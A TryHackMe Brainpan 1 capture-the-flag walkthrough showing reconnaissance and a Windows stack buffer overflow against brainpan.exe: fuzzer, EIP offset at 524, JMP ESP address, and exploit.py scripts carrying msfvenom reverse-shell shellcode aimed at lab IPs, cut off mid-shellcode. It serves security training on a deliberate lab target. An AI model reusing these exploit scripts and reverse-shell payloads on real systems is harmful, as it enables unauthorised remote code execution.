TryHackMe | Brainpan 1

Reverse engineer a Windows executable, find a buffer overflow and exploit it on a Linux machine.

tryhackme.com

Walkthrough

Gaining a Foothold

Nmap

Initial scan

──(kali㉿kali)-[~]
└─$ nmap 10.10.220.161           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-14 03:50 EST
Nmap scan report for 10.10.220.161
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT      STATE SERVICE
9999/tcp  open  abyss
10000/tcp open  snet-sensor-mgmt

Nmap done: 1 IP address (1 host up) scanned in 40.54 seconds

Scan on port 9999 and 10000

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p9999,10000 10.10.220.161                                                
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-14 03:51 EST
Nmap scan report for 10.10.220.161
Host is up (0.27s latency).

PORT      STATE SERVICE VERSION
9999/tcp  open  abyss?
| fingerprint-strings: 
|   NULL: 
|     _| _| 
|     _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_| 
|     _|_| _| _| _| _| _| _| _| _| _| _| _|
|     _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
|     [________________________ WELCOME TO BRAINPAN _________________________]
|_    ENTER THE PASSWORD
10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.3
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.94SVN%I=7%D=1/14%Time=65A3A090%P=x86_64-pc-linux-gnu%r
SF:(NULL,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|
SF:_\|\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x
SF:20\x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\
SF:|\x20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\
SF:|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\
SF:|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x2
SF:0\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x2
SF:0\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x2
SF:0\x20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x
SF:20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x2
SF:0\x20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPA
SF:N\x20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTE
SF:R\x20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.11 seconds

Web Page

10.10.220.161:10000

source code

/bin

Directory busting

FFUF

/bin

┌──(kali㉿kali)-[~]
└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://10.10.220.161:10000/FUZZ -recursion

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.220.161:10000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

# directory-list-2.3-medium.txt [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 276ms]
#                       [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 275ms]
# Priority ordered case sensative list, where entries were found  [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 275ms]
                        [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 275ms]
# on atleast 2 different hosts [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 275ms]
# or send a letter to Creative Commons, 171 Second Street,  [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1038ms]
# This work is licensed under the Creative Commons  [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1039ms]
#                       [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1039ms]
#                       [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1040ms]
# Attribution-Share Alike 3.0 License. To view a copy of this  [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1061ms]
# Copyright 2007 James Fisher [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1062ms]
#                       [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1064ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1064ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/  [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1065ms]
bin                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 272ms]
[INFO] Adding a new job to the queue: http://10.10.220.161:10000/bin/FUZZ

Buffer Overflow

Avoid fuzzing at this point as we can break the executable

nc 10.10.20.71 9999

On a Windows VM

Download and run Immunity Debugger as admin

Download and run brainpan.exe as admin

Attach brainpan to Immunity Debugger

Hit play to run

Download and move mona.py to PyCommands

https://github.com/corelan/mona

onfig -set workingfolder c:\mona\%p

Mona Configuration

The mona script has been preinstalled, however to make it easier to work with, you should configure a working folder using the following command, which you can run in the command input box at the bottom of the Immunity Debugger window:

!mona config -set workingfolder c:\mona\%p

Fuzzing

import sys, socket
from time import sleep

buffer = "A" * 100

while True:
	try:
		payload = buffer + '\r\n'
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.connect(('192.168.137.143',9999))
		print("[+] Sending the payload...\n" + str(len(buffer)))
		s.send((payload.encode()))
		s.close()
		sleep(1)
		buffer = buffer + "A" * 100
	except:
		print("The fuzzing crashed at %s bytes" % str(len(buffer)))
		sys.exit()

Run the fuzzer.py script using python: python3 fuzzer.pyThe fuzzer will send increasingly long strings comprised of As. If the fuzzer crashes the server with one of the strings, the fuzzer should exit with an error message. Make a note of the largest number of bytes that were sent.

┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ python3 fuzzer.py    
[+] Sending the payload...
100
[+] Sending the payload...
200
[+] Sending the payload...
300
[+] Sending the payload...
400
[+] Sending the payload...
500
[+] Sending the payload...
600
[+] Sending the payload...
700
[+] Sending the payload...
800
[+] Sending the payload...
900
^CThe fuzzing crashed at 1000 bytes

Crash Replication & Controlling EIP

Run the following command to generate a cyclic pattern of a length 400 bytes longer that the string that crashed the server (change the -l value to this):

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600

Copy the output and place it into the payload variable of the exploit.py script.

We will make a pattern exactly at the point where it crashed

┌──(kali㉿kali)-[~/LPE/brainpan] └─$ msf-pattern_create -l 1000 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

exploit.py

import sys, socket

buffer ="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"

print("Sending payload...")
payload = buffer + '\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.137.143',9999))
s.send((payload.encode()))
s.close()

┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ python3 exploit.py     
Sending payload...

Immunity crashed

EIP 35724134

┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ msf-pattern_offset -l 1000 -q 35724134
[*] Exact match at offset 524

That means that the EIP is at the 525th byte

Edit exploit.py

import sys, socket

buffer = "A" * 524 + "B" * 4
//This is gonna lead us up to EIP
//Then we should see 42424242 
//That way we know we are controlling the EIP

print("Sending payload...")
payload = buffer + '\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.137.143',9999))
s.send((payload.encode()))
s.close()

Run Immunity again and then run exploit.py

┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ python3 exploit.py   
Sending payload...

Finding Bad Characters

badchars

cytopia ⋅ 9 months ago

Copy badchars to exploit.py

import sys, socket

buffer = "A" * 524 + "B" * 4

badchars = (
  "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
  "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
  "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
  "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
  "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
  "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
  "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
  "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
  "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
  "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
  "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
  "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
  "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
  "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
  "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
  "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

print("Sending payload...")
payload = buffer + badchars + '\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.137.143',9999))
s.send((payload.encode()))
s.close()

Run Immunity again

Crashed > good

Right-click ESP > Follow in dump

After running the script, go back to Immunity, right-click on the hex value of the ESP register and select “Follow in Dump.” The list of characters that we sent from 01 to FF are in the hex dump pane. Closely examine the entire list to see if any of the hex numbers are out of sequence, which would indicate a bad character. In this case we do not have any bad chars.

Don’t rely on mona tool for finding badchar

Run Immunity again

Install Mona and check modules

!mona modules
All False is what we want

Find JMP point

!mona find -s "\xff\xe4" -m brainpan.exe

Found 311712f3

Click the black arrow key to find 311712f3

We found the JMP point

Press F2 to set a breaking point

Once we hit JMP instruction, we can get malicious

311712F3 in Little Indian format

Edit exploit.py

import sys, socket

buffer = b"A" * 524 + b"\xf3\x12\x17\x31"

print("Sending payload...")
payload = buffer + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.137.143',9999))
s.send(payload)
s.close()

*Heath (Course Instructor) had issues with payload encoding so here we are manually encoding our payload

Run Immunity and exploit.py

We reach breakpoint

Close Immunity

Run brainpan as admin

On kali, generate payload for a reverse shell

┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.137.133 LPORT=7777 -f c -b "\x00" 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes
unsigned char buf[] = 
"\xda\xdf\xd9\x74\x24\xf4\xbe\xf0\x0b\xa5\x15\x58\x2b\xc9"
"\xb1\x52\x31\x70\x17\x03\x70\x17\x83\x30\x0f\x47\xe0\x4c"
"\xf8\x05\x0b\xac\xf9\x69\x85\x49\xc8\xa9\xf1\x1a\x7b\x1a"
"\x71\x4e\x70\xd1\xd7\x7a\x03\x97\xff\x8d\xa4\x12\x26\xa0"
"\x35\x0e\x1a\xa3\xb5\x4d\x4f\x03\x87\x9d\x82\x42\xc0\xc0"
"\x6f\x16\x99\x8f\xc2\x86\xae\xda\xde\x2d\xfc\xcb\x66\xd2"
"\xb5\xea\x47\x45\xcd\xb4\x47\x64\x02\xcd\xc1\x7e\x47\xe8"
"\x98\xf5\xb3\x86\x1a\xdf\x8d\x67\xb0\x1e\x22\x9a\xc8\x67"
"\x85\x45\xbf\x91\xf5\xf8\xb8\x66\x87\x26\x4c\x7c\x2f\xac"
"\xf6\x58\xd1\x61\x60\x2b\xdd\xce\xe6\x73\xc2\xd1\x2b\x08"
"\xfe\x5a\xca\xde\x76\x18\xe9\xfa\xd3\xfa\x90\x5b\xbe\xad"
"\xad\xbb\x61\x11\x08\xb0\x8c\x46\x21\x9b\xd8\xab\x08\x23"
"\x19\xa4\x1b\x50\x2b\x6b\xb0\xfe\x07\xe4\x1e\xf9\x68\xdf"
"\xe7\x95\x96\xe0\x17\xbc\x5c\xb4\x47\xd6\x75\xb5\x03\x26"
"\x79\x60\x83\x76\xd5\xdb\x64\x26\x95\x8b\x0c\x2c\x1a\xf3"
"\x2d\x4f\xf0\x9c\xc4\xaa\x93\x62\xb0\x3d\xe6\x0b\xc3\x3d"
"\xf7\xaa\x4a\xdb\x6d\x3d\x1b\x74\x1a\xa4\x06\x0e\xbb\x29"
"\x9d\x6b\xfb\xa2\x12\x8c\xb2\x42\x5e\x9e\x23\xa3\x15\xfc"
"\xe2\xbc\x83\x68\x68\x2e\x48\x68\xe7\x53\xc7\x3f\xa0\xa2"
"\x1e\xd5\x5c\x9c\x88\xcb\x9c\x78\xf2\x4f\x7b\xb9\xfd\x4e"
"\x0e\x85\xd9\x40\xd6\x06\x66\x34\x86\x50\x30\xe2\x60\x0b"
"\xf2\x5c\x3b\xe0\x5c\x08\xba\xca\x5e\x4e\xc3\x06\x29\xae"
"\x72\xff\x6c\xd1\xbb\x97\x78\xaa\xa1\x07\x86\x61\x62\x37"
"\xcd\x2b\xc3\xd0\x88\xbe\x51\xbd\x2a\x15\x95\xb8\xa8\x9f"
"\x66\x3f\xb0\xea\x63\x7b\x76\x07\x1e\x14\x13\x27\x8d\x15"
"\x36";

Edit exploit.py

Add NOPs (No Operations) for a padding

import sys, socket

buffer = b"A" * 524 + b"\xf3\x12\x17\x31" + b"\x90" * 32

payload2 = (b"\xda\xdf\xd9\x74\x24\xf4\xbe\xf0\x0b\xa5\x15\x58\x2b\xc9"
b"\xb1\x52\x31\x70\x17\x03\x70\x17\x83\x30\x0f\x47\xe0\x4c"
b"\xf8\x05\x0b\xac\xf9\x69\x85\x49\xc8\xa9\xf1\x1a\x7b\x1a"
b"\x71\x4e\x70\xd1\xd7\x7a\x03\x97\xff\x8d\xa4\x12\x26\xa0"
b"\x35\x0e\x1a\xa3\xb5\x4d\x4f\x03\x87\x9d\x82\x42\xc0\xc0"
b"\x6f\x16\x99\x8f\xc2\x86\xae\xda\xde\x2d\xfc\xcb\x66\xd2"
b"\xb5\xea\x47\x45\xcd\xb4\x47\x64\x02\xcd\xc1\x7e\x47\xe8"
b"\x98\xf5\xb3\x86\x1a\xdf\x8d\x67\xb0\x1e\x22\x9a\xc8\x67"
b"\x85\x45\xbf\x91\xf5\xf8\xb8\x66\x87\x26\x4c\x7c\x2f\xac"
b"\xf6\x58\xd1\x61\x60\x2b\xdd\xce\xe6\x73\xc2\xd1\x2b\x08"
b"\xfe\x5a\xca\xde\x76\x18\xe9\xfa\xd3\xfa\x90\x5b\xbe\xad"
b"\xad\xbb\x61\x11\x08\xb0\x8c\x46\x21\x9b\xd8\xab\x08\x23"
b"\x19\xa4\x1b\x50\x2b\x6b\xb0\xfe\x07\xe4\x1e\xf9\x68\xdf"
b"\xe7\x95\x96\xe0\x17\xbc\x5c\xb4\x47\xd6\x75\xb5\x03\x26"
b"\x79\x60\x83\x76\xd5\xdb\x64\x26\x95\x8b\x0c\x2c\x1a\xf3"
b"\x2d\x4f\xf0\x9c\xc4\xaa\x93\x62\xb0\x3d\xe6\x0b\xc3\x3d"
b"\xf7\xaa\x4a\xdb\x6d\x3d\x1b\x74\x1a\xa4\x06\x0e\xbb\x29"
b"\x9d\x6b\xfb\xa2\x12\x8c\xb2\x42\x5e\x9e\x23\xa3\x15\xfc"
b"\xe2\xbc\x83\x68\x68\x2e\x48\x68\xe7\x53\xc7\x3f\xa0\xa2"
b"\x1e\xd5\x5c\x9c\x88\xcb\x9c\x78\xf2\x4f\x7b\xb9\xfd\x4e"
b"\x0e\x85\xd9\x40\xd6\x06\x66\x34\x86\x50\x30\xe2\x60\x0b"
b"\xf2\x5c\x3b\xe0\x5c\x08\xba\xca\x5e\x4e\xc3\x06\x29\xae"
b"\x72\xff\x6c\xd1\xbb\x97\x78\xaa\xa1\x07\x86\x61\x62\x37"
b"\xcd\x2b\xc3\xd0\x88\xbe\x51\xbd\x2a\x15\x95\xb8\xa8\x9f"
b"\x66\x3f\xb0\xea\x63\x7b\x76\x07\x1e\x14\x13\x27\x8d\x15"
b"\x36")





print("Sending payload...")
payload = buffer + payload2 + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.137.143',9999))
s.send(payload)
s.close()

Set up a listener

Run exploit.py

We get a reverse shell

We will apply this to our attack

Do the same but with tun0 IP

Generate reverse shell payload

┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.8.252.53 LPORT=7777 -f c -b "\x00"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes
unsigned char buf[] = 
"\xba\xb9\x16\x38\xe2\xdb\xcd\xd9\x74\x24\xf4\x5f\x33\xc9"
"\xb1\x52\x31\x57\x12\x03\x57\x12\x83\x7e\x12\xda\x17\x7c"
"\xf3\x98\xd8\x7c\x04\xfd\x51\x99\x35\x3d\x05\xea\x66\x8d"
"\x4d\xbe\x8a\x66\x03\x2a\x18\x0a\x8c\x5d\xa9\xa1\xea\x50"
"\x2a\x99\xcf\xf3\xa8\xe0\x03\xd3\x91\x2a\x56\x12\xd5\x57"
"\x9b\x46\x8e\x1c\x0e\x76\xbb\x69\x93\xfd\xf7\x7c\x93\xe2"
"\x40\x7e\xb2\xb5\xdb\xd9\x14\x34\x0f\x52\x1d\x2e\x4c\x5f"
"\xd7\xc5\xa6\x2b\xe6\x0f\xf7\xd4\x45\x6e\x37\x27\x97\xb7"
"\xf0\xd8\xe2\xc1\x02\x64\xf5\x16\x78\xb2\x70\x8c\xda\x31"
"\x22\x68\xda\x96\xb5\xfb\xd0\x53\xb1\xa3\xf4\x62\x16\xd8"
"\x01\xee\x99\x0e\x80\xb4\xbd\x8a\xc8\x6f\xdf\x8b\xb4\xde"
"\xe0\xcb\x16\xbe\x44\x80\xbb\xab\xf4\xcb\xd3\x18\x35\xf3"
"\x23\x37\x4e\x80\x11\x98\xe4\x0e\x1a\x51\x23\xc9\x5d\x48"
"\x93\x45\xa0\x73\xe4\x4c\x67\x27\xb4\xe6\x4e\x48\x5f\xf6"
"\x6f\x9d\xf0\xa6\xdf\x4e\xb1\x16\xa0\x3e\x59\x7c\x2f\x60"
"\x79\x7f\xe5\x09\x10\x7a\x6e\x3c\xed\x78\x5b\x28\xef\x80"
"\xba\xc9\x66\x66\xa8\x19\x2f\x31\x45\x83\x6a\xc9\xf4\x4c"
"\xa1\xb4\x37\xc6\x46\x49\xf9\x2f\x22\x59\x6e\xc0\x79\x03"
"\x39\xdf\x57\x2b\xa5\x72\x3c\xab\xa0\x6e\xeb\xfc\xe5\x41"
"\xe2\x68\x18\xfb\x5c\x8e\xe1\x9d\xa7\x0a\x3e\x5e\x29\x93"
"\xb3\xda\x0d\x83\x0d\xe2\x09\xf7\xc1\xb5\xc7\xa1\xa7\x6f"
"\xa6\x1b\x7e\xc3\x60\xcb\x07\x2f\xb3\x8d\x07\x7a\x45\x71"
"\xb9\xd3\x10\x8e\x76\xb4\x94\xf7\x6a\x24\x5a\x22\x2f\x54"
"\x11\x6e\x06\xfd\xfc\xfb\x1a\x60\xff\xd6\x59\x9d\x7c\xd2"
"\x21\x5a\x9c\x97\x24\x26\x1a\x44\x55\x37\xcf\x6a\xca\x38"
"\xda";

Edit exploit.py

Change target address to THM brainpan IP

import sys, socket

buffer = b"A" * 524 + b"\xf3\x12\x17\x31" + b"\x90" * 32

payload2 = (b"\xba\xb9\x16\x38\xe2\xdb\xcd\xd9\x74\x24\xf4\x5f\x33\xc9"
b"\xb1\x52\x31\x57\x12\x03\x57\x12\x83\x7e\x12\xda\x17\x7c"
b"\xf3\x98\xd8\x7c\x04\xfd\x51\x99\x35\x3d\x05\xea\x66\x8d"
b"\x4d\xbe\x8a\x66\x03\x2a\x18\x0a\x8c\x5d\xa9\xa1\xea\x50"
b"\x2a\x99\xcf\xf3\xa8\xe0\x03\xd3\x91\x2a\x56\x12\xd5\x57"
b"\x9b\x46\x8e\x1c\x0e\x76\xbb\x69\x93\xfd\xf7\x7c\x93\xe2"
b"\x40\x7e\xb2\xb5\xdb\xd9\x14\x34\x0f\x52\x1d\x2e\x4c\x5f"
b"\xd7\xc5\xa6\x2b\xe6\x0f\xf7\xd4\x45\x6e\x37\x27\x97\xb7"
b"\xf0\xd8\xe2\xc1\x02\x64\xf5\x16\x78\xb2\x70\x8c\xda\x31"
b"\x22\x68\xda\x96\xb5\xfb\xd0\x53\xb1\xa3\xf4\x62\x16\xd8"
b"\x01\xee\x99\x0e\x80\xb4\xbd\x8a\xc8\x6f\xdf\x8b\xb4\xde"
b"\xe0\xcb\x16\xbe\x44\x80\xbb\xab\xf4\xcb\xd3\x18\x35\xf3"
b"\x23\x37\x4e\x80\x11\x98\xe4\x0e\x1a\x51\x23\xc9\x5d\x48"
b"\x93\x45\xa0\x73\xe4\x4c\x67\x27\xb4\xe6\x4e\x48\x5f\xf6"
b"\x6f\x9d\xf0\xa6\xdf\x4e\xb1\x16\xa0\x3e\x59\x7c\x2f\x60"
